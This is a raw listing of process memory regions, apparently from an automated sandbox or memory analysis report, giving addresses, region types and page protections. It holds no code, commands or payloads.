trusted library allocation
page read and write
1B000000
heap
page read and write
13E9DCD1000
trusted library allocation
page read and write
1B1D3000
heap
page read and write
34A9000
trusted library allocation
page read and write
7FF848E5C000
trusted library allocation
page execute and read and write
5D2C000
stack
page read and write
1E864590000
heap
page read and write
34FA000
trusted library allocation
page read and write
16C2A5F7000
heap
page read and write
21A2E4EB000
heap
page read and write
D8547FE000
stack
page read and write
D36000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
15CBEA20000
heap
page read and write
15CC0AF0000
trusted library allocation
page read and write
1180000
trusted library allocation
page read and write
FA5000
heap
page read and write
29A21DF7000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
36EC000
trusted library allocation
page read and write
13F7F000
trusted library allocation
page read and write
7FF8490A0000
trusted library allocation
page read and write
9BEE000
stack
page read and write
2BD43EA8000
heap
page read and write
1BCAE000
heap
page read and write
2B4D000
trusted library allocation
page read and write
27E3000
trusted library allocation
page read and write
29A21E34000
heap
page read and write
3923593000
stack
page read and write
25B9000
trusted library allocation
page read and write
7FF849130000
trusted library allocation
page read and write
28C1000
trusted library allocation
page read and write
E4CE000
stack
page read and write
1D5D7050000
heap
page read and write
7FF848FB0000
trusted library allocation
page execute and read and write
7FF8490C0000
trusted library allocation
page read and write
2BF7000
trusted library allocation
page read and write
E38E000
stack
page read and write
2D65000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
1610000
heap
page read and write
2CF7A1C0000
heap
page read and write
790000
heap
page read and write
35D7000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
14A0000
trusted library section
page read and write
15CD86F0000
heap
page execute and read and write
ECE000
stack
page read and write
5330000
trusted library allocation
page read and write
3076000
trusted library allocation
page read and write
34C7000
trusted library allocation
page read and write
3F0000
heap
page read and write
13F67000
trusted library allocation
page read and write
2771000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
14E2000
trusted library allocation
page read and write
66C0AFF000
stack
page read and write
2F60000
heap
page read and write
31E6000
trusted library allocation
page read and write
1BB10000
heap
page read and write
BE2000
unkown
page readonly
7FF849170000
trusted library allocation
page read and write
7F6E000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
393C92C000
stack
page read and write
5A8B000
heap
page read and write
7FF849010000
trusted library allocation
page read and write
2E2A000
trusted library allocation
page read and write
EA0000
trusted library allocation
page read and write
2F55000
trusted library allocation
page read and write
362E000
trusted library allocation
page read and write
21A2E880000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
15CD8973000
heap
page read and write
2CBE000
trusted library allocation
page read and write
10B2000
trusted library allocation
page read and write
3923FFB000
stack
page read and write
36DC000
trusted library allocation
page read and write
B5A0000
trusted library allocation
page execute and read and write
16C2A7A0000
heap
page read and write
13E8B9DA000
heap
page read and write
29A09B30000
heap
page execute and read and write
1C6113EB000
heap
page read and write
3246000
trusted library allocation
page read and write
59A0000
heap
page read and write
7FF848E4C000
trusted library allocation
page execute and read and write
28736760000
heap
page read and write
7FF849000000
trusted library allocation
page read and write
2747000
trusted library allocation
page read and write
13998000
trusted library allocation
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
33A5000
trusted library allocation
page read and write
7FF848E96000
trusted library allocation
page read and write
128F0A81000
heap
page read and write
2FB3000
trusted library allocation
page read and write
FF0000
heap
page read and write
1C74A000
stack
page read and write
1319F000
trusted library allocation
page read and write
E60E000
stack
page read and write
7FF849120000
trusted library allocation
page read and write
254DB4E0000
heap
page read and write
29A09685000
trusted library allocation
page read and write
2FA3000
trusted library allocation
page read and write
1B0A0000
trusted library allocation
page read and write
AEAA000
heap
page read and write
29A09B90000
heap
page read and write
1E864599000
heap
page read and write
2E72000
trusted library allocation
page read and write
1C11E000
stack
page read and write
2787E2F0000
heap
page read and write
66C08FC000
stack
page read and write
1AC9A690000
heap
page read and write
2873000
trusted library allocation
page read and write
15CD0541000
trusted library allocation
page read and write
36F8000
trusted library allocation
page read and write
2FC2000
trusted library allocation
page read and write
3478000
trusted library allocation
page read and write
626E000
stack
page read and write
5AEC000
stack
page read and write
19133712000
trusted library allocation
page read and write
1B9A0000
heap
page read and write
13E8BB30000
trusted library allocation
page read and write
1C40B000
stack
page read and write
21A2E4E6000
heap
page read and write
19131DC6000
heap
page read and write
14F2000
trusted library allocation
page read and write
C5F000
stack
page read and write
302E000
trusted library allocation
page read and write
1C30C000
stack
page read and write
1C10E000
stack
page read and write
7FF848E0B000
trusted library allocation
page execute and read and write
298D000
trusted library allocation
page read and write
2A38000
trusted library allocation
page read and write
1A7AAE10000
heap
page read and write
7FF848FA0000
trusted library allocation
page read and write
AE83000
heap
page read and write
1CF05ED0000
heap
page read and write
3019000
trusted library allocation
page read and write
EE0000
trusted library allocation
page read and write
7FF849110000
trusted library allocation
page read and write
338C000
trusted library allocation
page read and write
761277F000
stack
page read and write
2902000
trusted library allocation
page read and write
1BF1F000
stack
page read and write
7FF8491C0000
trusted library allocation
page read and write
7FF848F9A000
trusted library allocation
page read and write
11A0000
heap
page read and write
13EA5A19000
heap
page read and write
346F000
trusted library allocation
page read and write
35AB000
trusted library allocation
page read and write
3519000
trusted library allocation
page read and write
59E8000
heap
page read and write
1A8AC1E1000
heap
page read and write
F63C000
stack
page read and write
1475000
trusted library allocation
page execute and read and write
2CBA000
trusted library allocation
page read and write
2E0E000
stack
page read and write
2B74000
trusted library allocation
page read and write
3294000
trusted library allocation
page read and write
2D40000
trusted library allocation
page read and write
26B3000
trusted library allocation
page read and write
15CD082F000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
1B31E000
stack
page read and write
29A09A50000
trusted library allocation
page read and write
52DE000
stack
page read and write
19131CF0000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
2E2E000
trusted library allocation
page read and write
25E4000
trusted library allocation
page read and write
1B070000
trusted library allocation
page read and write
29A21D91000
heap
page read and write
36FF000
trusted library allocation
page read and write
2911000
trusted library allocation
page read and write
10B6000
trusted library allocation
page execute and read and write
12911000
trusted library allocation
page read and write
337F000
trusted library allocation
page read and write
14E6000
trusted library allocation
page execute and read and write
75F000
stack
page read and write
1690000
trusted library allocation
page read and write
343D000
trusted library allocation
page read and write
7FF848E96000
trusted library allocation
page read and write
27B2000
trusted library allocation
page read and write
128F09A0000
heap
page read and write
D80F5EE000
stack
page read and write
28736740000
heap
page read and write
2915000
trusted library allocation
page read and write
350C000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
15CD8891000
heap
page read and write
C41AAFF000
stack
page read and write
19131DC4000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
4F4A1F7000
stack
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
2BD43CD0000
heap
page read and write
13ED7000
trusted library allocation
page read and write
25F2000
trusted library allocation
page read and write
33DB000
trusted library allocation
page read and write
347C000
trusted library allocation
page read and write
2F04000
trusted library allocation
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
16C2A880000
heap
page read and write
1B430000
trusted library section
page read and write
2FE6000
trusted library allocation
page read and write
2F6B000
trusted library allocation
page read and write
E88C000
stack
page read and write
29A09BA3000
heap
page read and write
3570000
trusted library allocation
page read and write
2E6E000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
26B7000
trusted library allocation
page read and write
7FF848FC9000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
1670000
trusted library allocation
page read and write
2917000
trusted library allocation
page read and write
15CBE930000
trusted library allocation
page read and write
14CD000
trusted library allocation
page execute and read and write
32EE000
trusted library allocation
page read and write
2EB3000
trusted library allocation
page read and write
FF200000
trusted library allocation
page execute and read and write
15CC13CC000
trusted library allocation
page read and write
1914BE53000
heap
page read and write
1167000
heap
page read and write
5440000
trusted library allocation
page execute and read and write
680000
unkown
page readonly
1C57BA0C000
heap
page read and write
2780000
trusted library allocation
page read and write
15CD0551000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
25CC000
trusted library allocation
page read and write
2F4D000
trusted library allocation
page read and write
AD40000
heap
page read and write
1C57B990000
heap
page read and write
3637000
trusted library allocation
page read and write
7FF848FC4000
trusted library allocation
page read and write
3064000
trusted library allocation
page read and write
9A007A000
stack
page read and write
7FF8490C0000
trusted library allocation
page read and write
1C611310000
heap
page read and write
7FF848E7C000
trusted library allocation
page execute and read and write
13E8D8CE000
heap
page read and write
EF0000
heap
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
99FDFE000
stack
page read and write
27CE000
trusted library allocation
page read and write
F17C000
stack
page read and write
3577000
trusted library allocation
page read and write
2E4E000
trusted library allocation
page read and write
B3B18FF000
stack
page read and write
13AB000
heap
page read and write
1914BF99000
heap
page read and write
1A8AC1E0000
heap
page read and write
13B16000
trusted library allocation
page read and write
29D8000
trusted library allocation
page read and write
E8C000
heap
page read and write
3451000
trusted library allocation
page read and write
35A7000
trusted library allocation
page read and write
2689000
trusted library allocation
page read and write
19131D7D000
heap
page read and write
1398D000
trusted library allocation
page read and write
2646000
trusted library allocation
page read and write
333D000
trusted library allocation
page read and write
1140000
heap
page read and write
1ACD0000
heap
page read and write
1EC380E0000
heap
page read and write
2A2F000
trusted library allocation
page read and write
1466000
trusted library allocation
page execute and read and write
2682000
trusted library allocation
page read and write
13EA5AD0000
heap
page read and write
34D7000
trusted library allocation
page read and write
1D9D0000
heap
page read and write
34F7000
trusted library allocation
page read and write
B072000
heap
page read and write
2D7D000
trusted library allocation
page read and write
29A07CC8000
heap
page read and write
254DB4D0000
heap
page read and write
25E1000
trusted library allocation
page read and write
143BF000
trusted library allocation
page read and write
85A21FF000
stack
page read and write
1C64A000
stack
page read and write
28C5000
trusted library allocation
page read and write
518F000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
359B000
trusted library allocation
page read and write
34FF000
trusted library allocation
page read and write
2EAF000
trusted library allocation
page read and write
13EC5000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
354A000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
13148000
trusted library allocation
page read and write
19131D42000
heap
page read and write
25FF000
trusted library allocation
page read and write
7FF848E0B000
trusted library allocation
page execute and read and write
7FF848EC6000
trusted library allocation
page read and write
13F87000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page execute and read and write
1A8AC1E1000
heap
page read and write
3517000
trusted library allocation
page read and write
354F000
trusted library allocation
page read and write
34BC000
trusted library allocation
page read and write
2B81000
trusted library allocation
page read and write
7FF848FE9000
trusted library allocation
page read and write
3539000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
D854578000
stack
page read and write
1460000
trusted library allocation
page read and write
31B9000
trusted library allocation
page read and write
B3B17FF000
unkown
page read and write
FF5000
heap
page read and write
1BACA000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
2E5E000
stack
page read and write
2D89000
trusted library allocation
page read and write
F13000
trusted library allocation
page read and write
16C2A884000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
2B98000
trusted library allocation
page read and write
1FB637D000
stack
page read and write
57DD000
stack
page read and write
2F1B000
trusted library allocation
page read and write
10C7000
heap
page read and write
14D0000
trusted library allocation
page read and write
15CC153D000
trusted library allocation
page read and write
CA6E000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
2BEE000
stack
page read and write
2E93000
trusted library allocation
page read and write
4ECE000
trusted library allocation
page read and write
25EE000
trusted library allocation
page read and write
39238FE000
stack
page read and write
25F0000
trusted library allocation
page read and write
1FB73CE000
stack
page read and write
2B4F000
trusted library allocation
page read and write
3496000
trusted library allocation
page read and write
1B6CA000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
139D7000
trusted library allocation
page read and write
2F71000
trusted library allocation
page read and write
7FF848E44000
trusted library allocation
page read and write
15CBE9C0000
trusted library allocation
page read and write
1C84D000
stack
page read and write
277D000
trusted library allocation
page read and write
2F16000
trusted library allocation
page read and write
2D4C000
trusted library allocation
page read and write
4F20000
trusted library allocation
page read and write
1CB50000
trusted library section
page read and write
7FF8491B4000
trusted library allocation
page read and write
128A000
heap
page read and write
3164000
trusted library allocation
page read and write
A40000
heap
page read and write
3537000
trusted library allocation
page read and write
D85437E000
stack
page read and write
D0B000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
7FF848F80000
trusted library allocation
page read and write
347D000
trusted library allocation
page read and write
13EBF000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
12B87000
trusted library allocation
page read and write
1B450000
heap
page read and write
ED0000
heap
page read and write
29A1A041000
trusted library allocation
page read and write
13EB000
heap
page read and write
15CD87B5000
heap
page read and write
2CBDFE00000
heap
page read and write
21426954000
heap
page read and write
2AD6000
trusted library allocation
page read and write
2DAB000
trusted library allocation
page read and write
29A21F58000
heap
page read and write
1E068AE4000
heap
page read and write
D78000
heap
page read and write
39235DF000
stack
page read and write
2B1B000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
128F0A71000
heap
page read and write
3548000
trusted library allocation
page read and write
7FF848DF4000
trusted library allocation
page read and write
5A20000
heap
page read and write
9D33000
heap
page read and write
298B000
trusted library allocation
page read and write
2900000
heap
page read and write
15CBE738000
heap
page read and write
D85487B000
stack
page read and write
E1ACCFF000
stack
page read and write
C87E000
stack
page read and write
7FF848E04000
trusted library allocation
page read and write
3431000
trusted library allocation
page read and write
506E000
stack
page read and write
15CD8544000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
7BD000
heap
page read and write
2F77000
trusted library allocation
page read and write
28736860000
heap
page read and write
E40000
heap
page read and write
29A4000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
7FF848FA1000
trusted library allocation
page read and write
7FF848FE7000
trusted library allocation
page read and write
393CCFF000
unkown
page read and write
26BC000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
2B70000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
27A3000
trusted library allocation
page read and write
384C000
trusted library allocation
page read and write
1B1BF000
heap
page read and write
2785000
trusted library allocation
page read and write
1444000
trusted library allocation
page read and write
19133710000
trusted library allocation
page read and write
7FF848E34000
trusted library allocation
page read and write
3ED1000
trusted library allocation
page read and write
33DA000
trusted library allocation
page read and write
12913000
trusted library allocation
page read and write
3499000
trusted library allocation
page read and write
10F4000
stack
page read and write
21A2E4FD000
heap
page read and write
A60000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
54AE000
stack
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
1D91E000
stack
page read and write
14EA000
trusted library allocation
page execute and read and write
7FF849010000
trusted library allocation
page read and write
F50000
heap
page read and write
3034000
trusted library allocation
page read and write
12932000
trusted library allocation
page read and write
AA30000
heap
page read and write
2989000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
25D3000
trusted library allocation
page read and write
19134A65000
trusted library allocation
page read and write
16C5000
heap
page read and write
2AF7000
trusted library allocation
page read and write
1BD0E000
heap
page read and write
2E75000
trusted library allocation
page read and write
1CC50000
trusted library section
page read and write
29A21FA6000
heap
page read and write
25FD000
trusted library allocation
page read and write
2D3C000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
254DB820000
heap
page read and write
3495000
trusted library allocation
page read and write
2E4C000
trusted library allocation
page read and write
19131D8C000
heap
page read and write
1D920000
heap
page read and write
99F91F000
stack
page read and write
2B42000
trusted library allocation
page read and write
2D10000
heap
page execute and read and write
7FF848E4B000
trusted library allocation
page execute and read and write
2850000
trusted library allocation
page read and write
AE20000
heap
page read and write
2FA7000
trusted library allocation
page read and write
7C0000
heap
page read and write
B40000
heap
page read and write
13E8D9D0000
heap
page execute and read and write
C41AA7F000
stack
page read and write
7FF849190000
trusted library allocation
page read and write
1A961000
heap
page read and write
B9CE000
stack
page read and write
5320000
trusted library allocation
page read and write
770000
heap
page read and write
21426560000
heap
page read and write
3535000
trusted library allocation
page read and write
2F17000
trusted library allocation
page read and write
139B7000
trusted library allocation
page read and write
1A8F0000
trusted library allocation
page read and write
1EC381E0000
heap
page read and write
7FF849080000
trusted library allocation
page read and write
13EA5A7F000
heap
page read and write
2E60000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page read and write
3531000
trusted library allocation
page read and write
2EDA000
trusted library allocation
page read and write
29A21D93000
heap
page read and write
2F3B000
trusted library allocation
page read and write
2613000
trusted library allocation
page read and write
7FF8490C0000
trusted library allocation
page read and write
BE3000
unkown
page execute and read and write
13ECF000
trusted library allocation
page read and write
1320000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
8DEE000
stack
page read and write
1DADF000
stack
page read and write
1AF80000
heap
page execute and read and write
7FF848E96000
trusted library allocation
page read and write
2CF7A620000
heap
page read and write
AE3E000
heap
page read and write
13E8BB80000
trusted library allocation
page read and write
78CE000
stack
page read and write
13EA5A00000
heap
page read and write
29A21FD4000
heap
page read and write
7FF8490A0000
trusted library allocation
page execute and read and write
3025000
trusted library allocation
page read and write
15C0000
trusted library allocation
page read and write
10C2000
trusted library allocation
page read and write
2CBDFF00000
heap
page read and write
2F8B000
trusted library allocation
page read and write
7FF848DE4000
trusted library allocation
page read and write
1C20B000
stack
page read and write
15CD8775000
heap
page read and write
353F000
trusted library allocation
page read and write
30B7000
trusted library allocation
page read and write
B160000
trusted library allocation
page read and write
2857000
trusted library allocation
page read and write
2671000
trusted library allocation
page read and write
CE0000
heap
page execute and read and write
654E000
stack
page read and write
14AD000
stack
page read and write
13E8D9E1000
trusted library allocation
page read and write
2FD3000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
139A5000
trusted library allocation
page read and write
7FF4E6970000
trusted library allocation
page execute and read and write
1FB6778000
stack
page read and write
31F0000
trusted library allocation
page read and write
A80000
heap
page read and write
4EF6000
trusted library allocation
page read and write
1C01B000
heap
page read and write
1BFBB000
stack
page read and write
2FC4000
trusted library allocation
page read and write
11A8000
heap
page read and write
D35000
heap
page read and write
FE544DD000
stack
page read and write
1BFF8000
heap
page read and write
7FF848DFB000
trusted library allocation
page read and write
355B000
trusted library allocation
page read and write
3465000
trusted library allocation
page read and write
7A0000
heap
page read and write
15CBE73D000
heap
page read and write
7F81FDD000
stack
page read and write
99F892000
stack
page read and write
7FF848FC3000
trusted library allocation
page read and write
2E8F000
trusted library allocation
page read and write
5E6F000
stack
page read and write
354D000
trusted library allocation
page read and write
3175000
trusted library allocation
page read and write
349A000
trusted library allocation
page read and write
1250000
heap
page read and write
EA0000
trusted library allocation
page read and write
1A8AC380000
heap
page read and write
29A21DEB000
heap
page read and write
2E12000
trusted library allocation
page read and write
5590000
trusted library allocation
page execute and read and write
F10000
trusted library allocation
page read and write
2E135630000
heap
page read and write
2778000
trusted library allocation
page read and write
E1ACD7F000
stack
page read and write
29A0B1C4000
trusted library allocation
page read and write
77CD000
stack
page read and write
7E2E000
stack
page read and write
2A0C000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848DE0000
trusted library allocation
page read and write
1047000
heap
page read and write
99F99F000
stack
page read and write
2C81000
trusted library allocation
page read and write
3208000
trusted library allocation
page read and write
264A5137000
heap
page read and write
19133806000
heap
page execute and read and write
1914BE74000
heap
page read and write
7FF848EDC000
trusted library allocation
page execute and read and write
4F50000
trusted library allocation
page execute and read and write
254DB51B000
heap
page read and write
2F02000
trusted library allocation
page read and write
29B8000
trusted library allocation
page read and write
2ED1000
trusted library allocation
page read and write
36C7000
trusted library allocation
page read and write
1000000
heap
page read and write
2E1355E0000
heap
page read and write
34BA000
trusted library allocation
page read and write
7BED000
stack
page read and write
2CC6000
trusted library allocation
page read and write
3174000
trusted library allocation
page read and write
19131D10000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
7FF849180000
trusted library allocation
page read and write
1203000
heap
page read and write
1A7AAE30000
heap
page read and write
17E857F000
stack
page read and write
2835000
trusted library allocation
page read and write
2BAB000
trusted library allocation
page read and write
7FF848E0B000
trusted library allocation
page read and write
2F6D000
trusted library allocation
page read and write
31EE000
trusted library allocation
page read and write
332D000
trusted library allocation
page read and write
99FC7F000
stack
page read and write
14C3000
trusted library allocation
page execute and read and write
1380000
heap
page read and write
1B2C0000
heap
page execute and read and write
7FF849190000
trusted library allocation
page read and write
36F6000
trusted library allocation
page read and write
B6BE000
stack
page read and write
30A0000
heap
page execute and read and write
15CD8985000
heap
page read and write
14C4000
trusted library allocation
page read and write
AC76000
trusted library allocation
page read and write
3474000
trusted library allocation
page read and write
2638000
trusted library allocation
page read and write
35BA000
trusted library allocation
page read and write
2853000
trusted library allocation
page read and write
2E6C000
trusted library allocation
page read and write
7FF8490BD000
trusted library allocation
page read and write
ED5000
heap
page read and write
3923B7D000
stack
page read and write
273577EF000
heap
page read and write
2675000
trusted library allocation
page read and write
5190000
heap
page read and write
2CF7A624000
heap
page read and write
352D000
trusted library allocation
page read and write
5FA8000
stack
page read and write
7FC000
heap
page read and write
13E8B8A0000
heap
page read and write
2622000
trusted library allocation
page read and write
358C000
trusted library allocation
page read and write
7F822FE000
stack
page read and write
14E0000
trusted library allocation
page read and write
7FF84911C000
trusted library allocation
page read and write
2790000
trusted library allocation
page read and write
26A6000
trusted library allocation
page read and write
BE0000
unkown
page readonly
2B79000
trusted library allocation
page read and write
289F000
trusted library allocation
page read and write
2CB6000
trusted library allocation
page read and write
7FF848ED6000
trusted library allocation
page execute and read and write
2787E520000
heap
page read and write
1AC9A6D0000
heap
page read and write
328A000
trusted library allocation
page read and write
254DB700000
heap
page read and write
760000
trusted library allocation
page read and write
7FF848F90000
trusted library allocation
page read and write
1B8AB000
stack
page read and write
606B000
heap
page read and write
33D3000
trusted library allocation
page read and write
2EAF000
trusted library allocation
page read and write
34DD000
trusted library allocation
page read and write
3505000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
12917000
trusted library allocation
page read and write
2BB8000
trusted library allocation
page read and write
57A0000
heap
page read and write
261208D0000
heap
page read and write
AAF000
heap
page read and write
2CBE0064000
heap
page read and write
7FF848E3C000
trusted library allocation
page execute and read and write
356C000
trusted library allocation
page read and write
29E3000
trusted library allocation
page read and write
281B000
trusted library allocation
page read and write
2F24000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page execute and read and write
7FF848ECC000
trusted library allocation
page execute and read and write
1B4C0000
heap
page execute and read and write
4F4A47F000
stack
page read and write
1D62E000
stack
page read and write
556E000
stack
page read and write
D85524E000
stack
page read and write
359A000
trusted library allocation
page read and write
1657A490000
heap
page read and write
19131C10000
heap
page read and write
CF5000
heap
page read and write
3170000
trusted library allocation
page read and write
33DF000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
392387F000
stack
page read and write
2F0A000
trusted library allocation
page read and write
13EA59E0000
heap
page read and write
30EE000
trusted library allocation
page read and write
1B4A0000
trusted library section
page read and write
F07C000
stack
page read and write
2A0B000
trusted library allocation
page read and write
1B28B000
heap
page read and write
313B000
trusted library allocation
page read and write
25CA000
trusted library allocation
page read and write
5580000
heap
page read and write
1615000
heap
page read and write
1540000
trusted library allocation
page read and write
285E000
trusted library allocation
page read and write
7FF848FE0000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
301D000
trusted library allocation
page read and write
1314D000
trusted library allocation
page read and write
1BCF0000
heap
page read and write
2939000
trusted library allocation
page read and write
13E8B994000
heap
page read and write
2ADB000
trusted library allocation
page read and write
358F000
trusted library allocation
page read and write
6F4000
stack
page read and write
34AE000
trusted library allocation
page read and write
13EA5A39000
heap
page read and write
3522000
trusted library allocation
page read and write
2DA1000
trusted library allocation
page read and write
CC4E000
stack
page read and write
B28947D000
stack
page read and write
2806000
trusted library allocation
page read and write
1E4EB000
stack
page read and write
1B3FC000
heap
page read and write
FB204FF000
unkown
page read and write
ECFE000
stack
page read and write
125ED000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
5A02000
heap
page read and write
85A1DB7000
stack
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
326D000
trusted library allocation
page read and write
1AB6D000
stack
page read and write
16C2A5D0000
heap
page read and write
292B000
trusted library allocation
page read and write
14DD000
trusted library allocation
page execute and read and write
1D274000
heap
page read and write
2F3D000
trusted library allocation
page read and write
13EA5A37000
heap
page read and write
3212000
trusted library allocation
page read and write
349A000
trusted library allocation
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
1B1F2000
heap
page read and write
CC8F000
stack
page read and write
128F0A80000
heap
page read and write
E74D000
stack
page read and write
5A2C000
heap
page read and write
128F0A70000
heap
page read and write
2C00000
heap
page execute and read and write
2976000
trusted library allocation
page read and write
5420000
trusted library allocation
page read and write
3277000
trusted library allocation
page read and write
7FF848E14000
trusted library allocation
page read and write
2D44000
trusted library allocation
page read and write
30C6000
trusted library allocation
page read and write
355D000
trusted library allocation
page read and write
31E2000
trusted library allocation
page read and write
1914BF5A000
heap
page read and write
ACD0000
trusted library allocation
page read and write
372A000
trusted library allocation
page read and write
D80F56D000
stack
page read and write
15CD875B000
heap
page read and write
AE7E000
heap
page read and write
EF3C000
stack
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
128F0A82000
heap
page read and write
1BC1D000
heap
page read and write
25C1000
trusted library allocation
page read and write
13E8D470000
heap
page read and write
1399F000
trusted library allocation
page read and write
1FB67FE000
stack
page read and write
13F8F000
trusted library allocation
page read and write
16C2A5F4000
heap
page read and write
EB60000
heap
page execute and read and write
21A2E4E0000
heap
page read and write
1293E000
trusted library allocation
page read and write
3168000
trusted library allocation
page read and write
2D9C000
trusted library allocation
page read and write
11C0000
trusted library allocation
page read and write
33E3000
trusted library allocation
page read and write
DAA000
heap
page read and write
13E0000
trusted library section
page read and write
1B42E000
stack
page read and write
33BA000
trusted library allocation
page read and write
9CEC000
stack
page read and write
7FF848EC6000
trusted library allocation
page execute and read and write
7FF849030000
trusted library allocation
page read and write
13E9DA57000
trusted library allocation
page read and write
13A67000
trusted library allocation
page read and write
1520000
heap
page read and write
1B440000
trusted library section
page read and write
2F19000
trusted library allocation
page read and write
1E068988000
heap
page read and write
1B5D0000
heap
page read and write
4675000
trusted library allocation
page read and write
3923CF9000
stack
page read and write
13EA59F9000
heap
page read and write
1B10D000
stack
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
3126000
trusted library allocation
page read and write
348B000
trusted library allocation
page read and write
36FD000
trusted library allocation
page read and write
1AC9A6F8000
heap
page read and write
2BC9000
trusted library allocation
page read and write
1CF05D10000
heap
page read and write
2787E320000
heap
page read and write
1914BE50000
heap
page read and write
F00000
trusted library allocation
page read and write
99FEF8000
stack
page read and write
1D9DC000
heap
page read and write
92AC000
stack
page read and write
CD30000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
EFE4A7D000
stack
page read and write
128F0A83000
heap
page read and write
74A0000
trusted library allocation
page read and write
26120904000
heap
page read and write
F1C000
heap
page read and write
2B62000
trusted library allocation
page read and write
353B000
trusted library allocation
page read and write
13E8EE54000
trusted library allocation
page read and write
7B2E000
stack
page read and write
264A4FC0000
heap
page read and write
1402F000
trusted library allocation
page read and write
7FF848EBC000
trusted library allocation
page execute and read and write
7FF848E2D000
trusted library allocation
page execute and read and write
1C6113C4000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
34D2000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
35BE000
trusted library allocation
page read and write
2FC1000
trusted library allocation
page read and write
15CD8C30000
heap
page read and write
1220000
heap
page read and write
19131E94000
trusted library allocation
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
7FF849190000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
1430000
trusted library allocation
page read and write
1657A5B0000
heap
page read and write
1914C01A000
heap
page read and write
CDFD000
stack
page read and write
59FC000
heap
page read and write
15F3000
trusted library allocation
page read and write
4EB0000
trusted library allocation
page read and write
3199000
trusted library allocation
page read and write
10C5000
trusted library allocation
page execute and read and write
33CA000
trusted library allocation
page read and write
34A5000
trusted library allocation
page read and write
12938000
trusted library allocation
page read and write
1C57BA09000
heap
page read and write
7FF848FA8000
trusted library allocation
page read and write
2EE6000
trusted library allocation
page read and write
15E0000
trusted library allocation
page read and write
31E4000
trusted library allocation
page read and write
29C7000
trusted library allocation
page read and write
33BE000
trusted library allocation
page read and write
279C000
trusted library allocation
page read and write
36FA000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
5A2E000
stack
page read and write
2773000
trusted library allocation
page read and write
7FF848ED0000
trusted library allocation
page execute and read and write
29A0A1CB000
trusted library allocation
page read and write
214265B0000
heap
page read and write
7FF849079000
trusted library allocation
page read and write
34B1000
trusted library allocation
page read and write
331F000
trusted library allocation
page read and write
356A000
trusted library allocation
page read and write
2E9A000
trusted library allocation
page read and write
1B637000
heap
page read and write
1914BD69000
heap
page read and write
2ED1000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page read and write
29FA000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
5D0000
heap
page read and write
2C5B000
trusted library allocation
page read and write
53F3000
heap
page execute and read and write
7FF849110000
trusted library allocation
page read and write
1B4C3000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
3570000
trusted library allocation
page read and write
2926000
trusted library allocation
page read and write
29A08054000
heap
page read and write
2E9C000
stack
page read and write
1657A3B0000
heap
page read and write
2C6E000
trusted library allocation
page read and write
2F06000
trusted library allocation
page read and write
29A0A1CF000
trusted library allocation
page read and write
CCE000
stack
page read and write
15CD89F4000
heap
page read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7F5000
stack
page read and write
4DAE000
stack
page read and write
